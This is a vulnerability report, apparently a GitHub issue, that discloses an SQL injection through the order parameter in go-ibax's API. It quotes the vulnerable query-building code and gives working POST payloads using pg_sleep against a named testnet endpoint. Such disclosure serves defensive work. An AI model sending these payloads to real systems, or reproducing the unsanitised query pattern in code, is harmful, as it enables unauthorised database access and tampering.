SQL injection vulnerability via order parameter

[QSec-Team]

Describe the bug

SQL Injection vulnerability in /packages/api/database.go of go-ibax via order parameter allows attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.This issue affects versions starting from commits on Jul 18, 2020.

file: 2 places

go-ibax/packages/api/database.go

Lines 186 to 189 in 6bac746

	if where == "" {
	sqlQuest = fmt.Sprintf(`select * from "%s" order by %s offset %d limit %d`, tableName, execOrder, (page-1)*limit, limit)
	} else {
	sqlQuest = fmt.Sprintf(`select * from "%s" where %s order by %s offset %d limit %d`, tableName, where, execOrder, (page-1)*limit, limit)

commits:
ac76098#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR172
ac76098#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174

POC:
Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData:
① order=1%3b+select+pg_sleep(10)--&table_name=pg_user&limit=1&page=1

② with where parameter :
order=1%3b+select+pg_sleep(10)--&table_name=pg_user&where=1=1&limit=1&page=1

Reproduction

Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData: order parameter

① order=1%3b+select+pg_sleep(10)--&table_name=pg_user&limit=1&page=1

② with where parameter :
order=1%3b+select+pg_sleep(10)--&table_name=pg_user&where=1=1&limit=1&page=1

as you can see, when I use pg_sleep, the request is delayed 10s.

System Info

*

Logs

No response

Validations

• Read the docs.
• Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
• Check that this is a concrete bug. For Q&A open a GitHub Discussion or join our Discord Chat Server.
• The provided reproduction is a minimal reproducible example of the bug.